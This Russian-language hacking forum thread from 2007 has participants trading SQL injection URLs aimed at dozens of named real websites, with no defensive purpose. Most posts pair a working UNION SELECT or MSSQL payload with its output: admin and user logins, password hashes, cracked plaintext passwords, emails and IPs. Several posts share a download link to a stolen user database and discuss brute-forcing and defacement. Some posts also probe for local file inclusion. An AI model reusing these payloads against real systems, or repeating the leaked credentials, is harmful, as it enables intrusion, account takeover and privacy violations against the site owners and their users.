http://www.russweb.ru/index.php?sn=rbc47&plan_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25/*
http://gonafish.com/index.php?id=-6+union+select+1,2,3,4,version(),6
=\
http://www.divo-ostrov.ru/rus/actions/fotoactions_index.php?id=BENCHMARK(1000000,MD5(NOW ()))
TAKEP,
http://www.divo-ostrov.ru/rus/actions/fotoactions_index.php?id=-10+union+select+1,password,username+from+users+ord er+by+2,2/*
UpTime.ru
8000 юзеров..
http://uptime.ru/downtime.php?host_id=-1+union+select+login,2,password,4,email,6,icq,8,9, 10,11,12+from+users+limit+8200,8201/*
уфф старо =\ :rolleyes:
http://www.avatary.ru/avatar.php?pid=93+union+select+1,version(),concat( user(),0x3a,0x3a,database()),4,5,6,7,8,9,10,11/*&a=1&w=100&p=12
}{0TT@БЬ)Ч
09.02.2007, 22:19
http://forum.siemens-club.ru/viewboard.php?BoardID=-29%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10/*
Подобрать не могу :(
Держи kamaz-ист :) http://forum.siemens-club.ru/viewboard.php?BoardID=-29+union+select+1,concat(username,char(58),passwor d),3,4,5,6,7,8,9,10+from+t_users/*
Всего зарегистрированных членов Клуба: 40264. Из них действительных: 7021 o_O
а самое интересное пассы в чистом виде :D
Держи kamaz-ист :) http://forum.siemens-club.ru/viewboard.php?BoardID=-29+union+select+1,concat(username,char(58),passwor d),3,4,5,6,7,8,9,10+from+t_users/*
Всего зарегистрированных членов Клуба: 40264. Из них действительных: 7021 o_O
а самое интересное пассы в чистом виде :D
мыльники тоже выводятся, так что хорошая база..да и словарик мона составить :)...
}{0TT@БЬ)Ч
09.02.2007, 22:29
еще есть колонка icqnumber ;)
UpTime.ru
8000 юзеров..
А там чё за шифрование , md4 ? Подскажите...
Thanat0z
09.02.2007, 22:47
мыльники тоже выводятся, так что хорошая база..да и словарик мона составить :)...мда а через админку управление сайтом..чувствую пахнет дефейсом
вы добраоись до админки? Сделайте дамп плиз
Constantine
09.02.2007, 22:52
А там чё за шифрование , md4 ? Подскажите...
Там mysql хэш.
~!DoK_tOR!~
09.02.2007, 22:56
http://arsenal.timglass.co.uk/viewnews.php?newsid=65'
http://www.vestingstadfm.nl/viewnews.php?newsid=24'
http://paxar.bc.ca/viewnews.php?newsID=13'
http://www.newdirect.ru/ibase/index.php?page=brd&id=9'
http://www.lichr.ee/new/index.php?page=3'
http://www.mzss.hr/index.cgi?menu_id=46'
}{0TT@БЬ)Ч
10.02.2007, 00:48
http://forum.siemens-club.ru/viewboard.php?BoardID=-29+union+select+1,concat(username,char(58),passwor d),3,4,5,6,7,8,9,10+from+t_users/*
Кто сменил юзера? стукни в асю пообщаемся.
http://www.oilsbyobletz.com/public/view_text.php?user_id=4%20union%20select%201,2,3,4 ,5,6,7,8/*
http://www.rusfmpro.ru/index.php?menu%5B0%5D=56&&user_id=-5%20union%20select%201,2,email,4,5,6,7,8,9,0,name, 12,13,14,15,16,17%20from%20users/*
http://www.naobcasach.pl/art.php?id=79%20union%20select%201,2,3,4,5,6,7,8,9 ,0,11,12,13/*
guest3297
10.02.2007, 01:15
офф топ
У тебя конструкция concat(user(),char(58),password()) прошла?
Ми пад сталом, спасибо побольше бы таких постов...
http://ufs.com.ua/stories/showlaw.php?id=-1+union+select+concat(user,char(58),password),2,3+ from+mysql.user/*
root:
nobody:46243a7171240b83
debian-sys-maint:51c3ad74176de8e5
daru:
http://www.contrast.net.ua/heating/pos.php?id=-1+union+select+1,2,3,4,5/*
http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,password,user,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38+from+users+where+id= 1/*
http://pressa.univ.kiev.ua/news.php?id=-1+union+select+1,2,4,3/*
http://www.fdr.com.ua/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
http://www.untp.org.ua/index.php?id=-1+union+select+1,2,3,4,5,6/*
http://www.management.com.ua/news/?id=-1+union+select+1,2,3/*
http://www.scg.com.ua/mc_news.php?id=-1+union+select+1,2,3,4/*
Thanat0z
10.02.2007, 03:58
_http://rapidshare.com/files/15758988/base_forum_siemens-club_ru.rar
login pass email icq (txt + xls) 400kb
pass:a-chat
количество записей :12266
6-знаков: 214
7-знаков: 326
Не менее 40 из них брутятся.
Самый стойкий криптографически пасс: ДяДяАдМиНиМоДеРаТоРпРоСтИ зАсРа
InferNo23
10.02.2007, 13:24
Restko.ru
12000 юзеров
http://restko.ru/print_market.php?market_id=-1+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, pass,32,33+from+user+limit+12000,12001/*
и
http://restko.ru/print_market.php?market_id=-1+union+select+1,login,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, pass,32,33+from+admin+limit+1,2/*
Restko.ru
12000 юзеров
http://restko.ru/print_market.php?market_id=-1+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, pass,32,33+from+user+limit+12000,12001/*
и
http://restko.ru/print_market.php?market_id=-1+union+select+1,login,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, pass,32,33+from+admin+limit+1,2/*
Также может понадобиться:
http://www.restko.ru/usr/
есть таблица id
InferNo23
10.02.2007, 18:12
http://www.novostroy.ru/directrix/details.php?item_id=-1+union+select+1,password,3,name,email,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+fr om+users+limit+1,2/*
http://www.bench-mark.ru/main.php?root_id=&text_id=-1+union+select+1,user(),3,version(),5/*
http://fpmt.ru/index.php?aid=-1+union+select+version()
http://www.wnqsport.ru/showtext.php?text_id=-1+union+select+1,2,versioN(),4,5,6/*
http://www.theolcom.ru/ru/full_text.php?TEXT_ID=-1+union+select+1,2,3,4,table_name,6,7+from+INFORMA TION_SCHEMA.TABLES+limit+4,5/*
какой то филиал Центр-Телекома
_http://www.kosnet.ru/modules/myarticles/topics.php?op=listarticles&topic_id=-99+union+select+1,2,3,concat(uid,0x3a,uname,0x3a,p ass),5+from+kosnet_users/*
пасс сложный пробрутить не удалось
http://gammer.itc.ua/?a=genre&upid=-4+union+select+concat(user,0x3a,password)+from+mys ql.user/*
root:7f269a3e6508d1ec
http://www.ipecac.com/bio.php?id=-44+union+select+1,2,user(),concat(database(),0x3a, 0x3a,version())/*
http://www.iwf.ru/main/bar2.php?idd=-370+union+select+1,concat(username,0x3a,password), 3,4,5,6,7,8+from+users/*
от админки пароль в другой таблице, подобрать не смог :(
http://www.press.pl/lewa_strona/show.php?idd=-25+union+select+1,2,concat(user(),0x3a,0x3a,versio n(),0x3a,0x3a,database()),4,5,6,7,8,9,10,11,12,13, 14,15/*
http://www.fcuniversitatea.ro/index.php?idd=-440+union+select+1,concat(convert(version()+using+ latin1),0x3a,0x3a,convert(user()+using+latin1),0x3 a,0x3a,convert(database()+using+latin1)),3,4,5,6,7 ,8,9,10,11/*
http://www.euros.com.ua/goods.php?idd=-15+union+select+1,2,3,concat(version(),0x3a,0x3a,u ser(),0x3a,0x3a,version()),5,6,7/*&id=4
http://www.chelindustry.ru/view2.php?idd=-137+union+select+1,2,3,4,5,6,7,8,9,10,concat(versi on(),0x3a,0x3a,user(),0x3a,0x3a,database()),12,13, 14,15/*
http://www.tol.cz/q-a/index.php?IdD=-15+union+select+concat(version(),0x3a,0x3a,user(), 0x3a,0x3a,database())/*
http://www.miedz.net/rz/zawodnik.php?idd=-106+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,concat(version(),0x3a,0x3a,user(),0x3a,0x3a, database()),18/*
http://www.magit.pl/multimedia_new/index.php?idd=-5+union+select+concat(login,0x3a,password),2+from+ users/*
admin:a4054b18b2e7f8c3688bbaa418323baf
чё-то на логин\пассы сёдня не проперло :D
InferNo23
10.02.2007, 20:06
http://www.artiks.ru/consultant_text.php?id=-1+union+select+1,2,version(),4,5,6,database(),user (),9,10,11,12,13/*
http://www.klimt02.net/jewellers/index.php?item_id=-1+union+select+1,current_date(),database(),version (),5,user()/*
http://www.insomniacmania.com/news_default.php?id=9999999/**/union/**/select/**/user(),2,3,4,5,6/*
http://www.cbio.ru/modules/news/article.php?storyid=-1+union+select+1,user()/*
http://expo.chelsi.ru/mainexpo.php?id=-1+union+select+1,user(),database(),4,version(),6,7 ,8,9,10,11,12,13,14,15,16,17,18,current_date(),20/*
http://www.allwebr.org.ru/index.php?id=-20+union+select+1,2/*
не подобрать...
Satirik, всё нормально подбираеца :)
http://www.allwebr.org.ru/index.php?id=-20+union+select+1,2,concat(version(),0x3a,0x3a,use r(),0x3a,0x3a,database()),4,5,6,7,8,9,10,11,12,13, 14,15/*
http://www.grafik-4u.de/index.php?page=2&c=1%20union%20select%201,concat(user_email,char(58 ),user_password),3,4%20from%20phpbb_users/*
900 юзеров :)
http://www.webchats.tv/webchat.php?ID=-1+union+select+1,2,3,4,5,6,7,8,user(),10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+f rom+users/*
Darkweider
11.02.2007, 01:32
Блин ребят где вы такие сайты находите дырявые? Везде же вроде такой стандартный метод инъекций пофиксили. =)
Thanat0z
11.02.2007, 05:12
http://spas-edko.org.ua/photo_h.php?id=-9+union+select+1,2,3,4,5,6,concat(user_name,char(5 8),password),8+from+users/*
Сенкс p-range, [ cash ] за помощь ;)
Кто найдет админку, напишите в приват
_http://www.searchmonster.org/index.php?l=-99+union+select+1,2,3,user,password,6+from+mysql.u ser/*
gmedia_search4us:monster9 (спс Thanat0z)
таблицу с юзерами не нашёл(
www.muzon.tv
Смотреть тайтл
http://www.muzon.tv/index.php?option=dld&cat=2&part=1&view=-1+union+select+concat(user,char(58),password)+from +mysql.user/*
root:237e36116eef0637
internati:0b89d2383b82c0b7
http://www.muzon.tv/index.php?option=dld&cat=2&part=1&view=-1+union+select+concat(login,char(58),pass)+from+us ers/*
tolik:321
danylko bogriv:anatolij
fight!fire!:oksana
ksukha:oksana
http://www.muzon.tv/index.php?option=dld&cat=2&part=1&view=-1+union+select+concat(user,char(58),pass)+from+adm in/*
roman:boykolviv123
untp.org.ua
Ivnision Power Board
http://www.untp.org.ua/index.php?id=-1+union+select+1,2,concat(name,char(58),member_log in_key,char(58),email,char(58),ip_address),4,5,6+f rom+ibf_members/*
Sashko:f1ea1bf75156c50f09791e7b210c1e69:abcde88@uk r.net:80.84.190.34
InferNo23
11.02.2007, 14:47
http://www.parfumerist.ru/stat.php?stat_id=-1+union+select+1,user,password,4,5+from+mysql.user/*
root:1dd500b601d8cc7d
http://www.gazclub.ru/sale/?sale_id=-1+union+select+1,2,current_date(),database(),versi on(),6,user(),8/*
http://www.kontec.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,database(),9,version( ),user(),current_date(),13,14,15,16,17,18,19,20,21 ,22,23/*
http://hold5.ru/mstat.php?stat_id=-1+union+select+1,2,3,4,5,version(),7,8,9,10/*
http://www.granpri-flower.ru/stat.php?stat_id=-1+union+select+1,2,3,4,5,database(),user(),8,9/*
http://muzspider.ru/download.php?id=-1+union+select+user(),2/* ;)
http://www.cellosoft.com/software/view.php?id=-45%20union%20select%201,2,3,4,5,6,7,8,9,0,11,12,13 ,14/*
http://www.nanocenter.umd.edu/equipment_detail.php?equipment_id=65%20UNION%20SEL ECT%200,1,2,3,4,5,email,7,8,9,10,11,12,13,14,15,16 ,17,18,username,password,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38%20from%20user/*
Вот еще:
http://www.dwt-haarlem.nl/index.php?page=artikel&nr=-145%20union%20select%201,concat(user,char(58),pass word),3,4,5%20from%20user/*
http://www.dwt-haarlem.nl/index.php?page=artikel&nr=-145%20union%20select%201,concat(user_email,char(58 ),user_password),3,4,5%20from%20phpbb_users/*
И еще одна (MsSql)
http://www.dentistry.ubc.ca/directory/faculty/detail.asp?user_id=1+or+1=(SELECT+TOP+1+cast(user_ name+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+% 20nvarchar)+from+gpr_user_tbl)--
И еще парочку (пруха у меня сегодня ) :)
http://www.top-nachrichten24.de/content/eansicht.php?nid=-670%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,password,login,name,email,22,23,2 4,25,26,27,28,29,30,31%20from%20user/*
http://www.abc-imports.com/public/list.php?user_id=-6%20UNION%20SELECT%200,1,2,3,4,5,database(),7,user (),9,10/*
http://www.mikelkelleystudio.com/public/view_exhibit.php?user_id=-6%20UNION%20SELECT%200,1,2,3,4,5,user(),7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,databas e(),60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,7 5,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90/*
http://www.ctbauer.com/public/view_exhibit.php?user_id=6%20UNION%20SELECT%200,1, 2,3,4,5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,%2028,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44%20,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,database(),60,61,62,63,64, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81 ,82,83,84,85,86,87,88,89,90/*
http://ogloszenia.jaslo4u.pl/index.php?catid=-7%20union%20select%20database(),2/*
http://www.philos.msu.ru/library.php?sid=-2+union+select+1,2,concat(login,0x3a,passw),4,5,6, 7,8,9,10,11+from+users/*
admin:a98948bf0421ef30e4e19c0b4844600d
http://www.stumptuous.com/cms/displaysection.php?sid=-4+union+select+concat(username,0x3a,password),2+fr om+author/*
krust:mongolkcndy
http://www.vectorlinux.com/topics.php?op=viewtopic&topic=-2+union+select+1,2,3,concat(name,0x3a,pass)+from+u sers/*
Tony Brijeski:dd0ced770c9b3a5209a1c48dba1c6d86 - он там главный похоже)) хотя хз)))
http://www.singletrackworld.com/article.php?sid=-1+union+select+concat(name,0x3a,pass)+from+users/*
admin:a1aa1235bfd3e72b88e8a9a5e9e2aafd (логин вродебы такой, вывести его не смог :D)
http://www.bityard.com/article.php?sid=-900+union+select+1,2,pass,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21+from+users/*
hz:erUp/TO/6KzsE (логин найти не смог, что за крипт пасса тож не пойму, хотя мож это и открытый пасс :D)
http://www.peruinforma.com/imwebsite/article.php?sid=-28079+union+select+1,2,concat(name,0x3a,pwd),4,5,6 ,7,8+from+authors/*
Admin:383b9cc05b994282c5b5e80202542ed9
http://www.emsch.ru/main.php?tid=-59+union+select+1,concat(username,0x3a,user_passwo rd)+from+users/*
Admin:7c1b969e5afc49ea256879b8131cac3d
http://www.dubinushka.ru/m_files.php?ms_id=-54+union+select+1,concat(login,0x3a,pass)+from+use rs/*
Kirilll:ba25703a7de3eaf0e093ce9da55e9abf
Blade:c9ea45596a6ab3d5ab1f846d2dd0d9e9
http://shots.osdir.com/slideshows/slideshow.php?slide=9&release=-99+union+select+AES_DECRYPT(aes_encrypt(user(),0x7 1),0x71),2,3,4,5,6,7,8,9,10,11,12,13/*
=\
}{0TT@БЬ)Ч
12.02.2007, 22:07
http://www.ufs.com.ua/stories/showlaw.php?id=-427+union+select+concat(user,0x3a,password),2,3+fr om+mysql.user+limit+1,1/*
Украинский Финансовый Сервер :D ох уж и не везет украинцам ;)
Termin@L
12.02.2007, 22:21
http://www.trb.org/news/blurb_detail.asp?id=2326
я лол помогите кто-нить отсюда вытащить через подзапросы
http://www.intersol.co.il/ispr/index.php?page=2'
2Termin@L
Там MsSql. http://www.trb.org/calendar/event.asp?id=1'
Значит мы нашли вывод ошибки, но это еще не означает что получится изменить запрос к бд
Вроде бы тут ничего нельзя сделать :(
http://planetelderscrolls.gamespy.com/fms/Image.php?id=-1+union+select+table_name,2,3,4+from+INFORMATION_S CHEMA.TABLES+limit+16,1/*
=\
}{0TT@БЬ)Ч
юзай поиск по форуму, про эту скулю я писал раньше
http://forum.antichat.ru/showpost.php?p=285086&postcount=482
muzon.com
http://muzon.com/view_post.php?post_id=-1+union+select+1,concat(name,char(58),pass,char(58 ),mail,char(58),icq),3,4,5,6,7,8,9,10,11+from+user s/*
дофига юзеров, асек, мыл
http://www.cisa.ru/news_full.php?nid=-26+union+select+session_user()/*&
http://www.teacherxpress.com/cat.php?gid=-31+union+select+1,concat(username,0x3a,password),3 +from+users/*
patrick:7a2eb41a38a8f4e39c1586649da21e5f
http://www.teacherxpress.com/cat.php?gid=-31+union+select+1,concat(username,0x3a,password),3 +from+users/*
patrick:7a2eb41a38a8f4e39c1586649da21e5f
patrick:helen
}{0TT@БЬ)Ч
13.02.2007, 01:09
}{0TT@БЬ)Ч
юзай поиск по форуму, про эту скулю я писал раньше
http://forum.antichat.ru/showpost.php?p=285086&postcount=482
хмм у меня поиск не находит видать потому что в коде постишь :rolleyes:
Вот нашел тока не пойму как ее заюзать? http://www.vsetv.com/remindpass.php?rplogin=1'+union+select+password+fr om+users/*&remindway=mail&subm2.x=33&subm2.y=21 скуля в напоминание пароля, как вывести данные? :(
http://www.f1-world.ru/champ2007/testres.php3?id=-1+union+select+1,concat(username,char(58),userpwd) ,3,4+from+users/*
admins:mikahakka
хмм у меня поиск не находит видать потому что в коде постишь :rolleyes:
Вот нашел тока не пойму как ее заюзать? http://www.vsetv.com/remindpass.php?rplogin=1'+union+select+password+fr om+users/*&remindway=mail&subm2.x=33&subm2.y=21 скуля в напоминание пароля, как вывести данные? :(Вот держи:
http://www.vsetv.com/remindpass.php?rplogin=1'+union+select+password+fr om+users+limit+0,1/*&remindway=secretq&subm2.x=28&subm2.y=6andrey:asdfgh
Данные выводятся под строкой "Секретный вопрос:" ;)
Вот, нарыл:
_http://kava.lviv.ua/event/index.php?id=-1+union+select+login,password,3+from+admin/*
_http://hockey.sport.com.ua/news.phtml?id=999999+union+select+username,passwor d,3,4,5,6,7,8,9,10,11,12+from+users/*
_http://www.yuretz.ru/prikol.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,11,12,13
_http://www.lv.ukrtelecom.ua/ua/hot_news/?id=202
Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.
Возможно некоторые не будут работать так как особо не вдавался в подробности. Не пинать )
http://www.startime.ru/rus/catalog.php?f='5eed087ad44807bca9394eb672be8e40
Думаю покапаться будет интересно
http://ckp.hut1.ru/index.php?akt=http://123
локальный инклуд
http://www.employment.ru/catalog/vi.php?pid='65
Можно покапаться
http://www.newastrakhan.ru/main.php?mode='fin
Локальный инклуд
http://adresov.net/search.php?q='
Можно покапаться
Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.
Возможно некоторые не будут работать так как особо не вдавался в подробности. Не пинать )
http://www.startime.ru/rus/catalog.php?f='5eed087ad44807bca9394eb672be8e40
Думаю покапаться будет интересно
http://ckp.hut1.ru/index.php?akt=http://123
локальный инклуд
http://www.employment.ru/catalog/vi.php?pid='65
Можно покапаться
http://www.newastrakhan.ru/main.php?mode='fin
Локальный инклуд
http://adresov.net/search.php?q='
Можно покапаться
К чему в этом топе локальный инклуд? =\
я же специально написал ...***Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.***
Все равно сюда за *халявой* идут :)
Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.
Возможно некоторые не будут работать так как особо не вдавался в подробности. Не пинать )
http://www.startime.ru/rus/catalog.php?f='5eed087ad44807bca9394eb672be8e40
Думаю покапаться будет интересно
http://ckp.hut1.ru/index.php?akt=http://123
локальный инклуд
http://www.employment.ru/catalog/vi.php?pid='65
Можно покапаться
http://www.newastrakhan.ru/main.php?mode='fin
Локальный инклуд
http://adresov.net/search.php?q='
Можно покапаться
http://www.startime.ru/rus/catalog.php?f=-99'+union+select+1,aes_decrypt(aes_encrypt(databas e(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.employment.ru/catalog/vi.php?pid=-99+union+select+1,2,3,concat(username,0x3a,user_pa ssword),5,6,7,8,9,10,11,12,13,14,15,16,17+from+php bb_users+limit+1,1/*
etc...
а инклуд на HUT'e вообще бред выкладывать =)
ок. Учту. + за вывод таблиц. Спасибо.
Насчет хата я незаметил )
http://www.bityard.com/article.php?sid=-900+union+select+1,2,pass,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21+from+users/*
hz:erUp/TO/6KzsE (логин найти не смог, что за крипт пасса тож не пойму, хотя мож это и открытый пасс :D)
Аналогично
http://www.wargames.ru/article.php?sid=-1+union+select+1,2,3,4,5,concat(uname,0x3a,pass),n ull,uid,9,10,email+from+users+limit+1,1/*AlexCat:lb6T/pvYnxejM
Судя по всему это "DES".
Thanat0z
13.02.2007, 22:46
почти всё инет-магазины
таблицы не нашел, лоадфайла нет
__http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,2,3,4/*&cat=Shoes%20and%20Trainers
__http://www.zaishu.com/shop.php?id=17+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13/*
в этих подзапросы, просто ошибки скуля, фильтрация пробелов и прочие приколы, разбирать не стал
__http://shop.fightresource.com/viewproducts.php?id=-33'+union+select+1,2,3,4,5,6,7,8,8/*
__http://www.ukrbiznes.com/website.php?id=47515'
__http://www.airsideshop.com/product.php?id=-231'
__http://www.stageagent.com/shows.php?id=686'+union+select+1,2/*
__http://www.qi.com/shop/qicat.php?id=-202'+union+select+1,2/*
__http://www.blackpoolpleasurebeach.com/shop/product.php?id=235'/*&typeid=5
__http://www.mediapro.com.ua/news/text.php?id=-99+union+select+1,2,concat(username,0x3a,user_pass word),4,5,6,7,8+from+phpbb_users+limit+1,1/*
admin:fa7f581027e58c9a5bcdbdc192d80c55
admin:011076
__http://www.synco.ru/text.php?id=-99+union+select+999/*
__http://www.legionhardware.com/document.php?id=-99+union+select+1,2,3,4,5,6,7,8,concat(name,0x3a,p assword),10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56, 57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73 ,74,75,76,77+from+users+limit+0,1/*
=\
http://svadba.irk.ru/catalog.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
_http://www.reflex.se/downloads.php?cat=1'
_http://www.xtremepsp.com/downloads.php?cat=2'
Thanat0z
14.02.2007, 01:44
_http://www.reflex.se/downloads.php?cat=1'
_http://www.xtremepsp.com/downloads.php?cat=2'
покажите реализацию, имхо здесь нет инъекций
покажите реализацию, имхо здесь нет инъекций
http://www.xtremepsp.com/downloads.php?cat=-99+union+select+1,user(),3,4,5,6,7,8/*
etc...
}{0TT@БЬ)Ч
14.02.2007, 01:58
а так круче http://www.xtremepsp.com/downloads.php?cat=-2+union+select+1,2,3,4,concat(name,char(58),passwo rd,char(58),email),6,7,8+from+members/* ;)
Thanat0z
14.02.2007, 02:00
млин, а мне на 7 уже было влом перебирать :) (ленивая сволочь)
держите плюсы
Простите засранца :)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot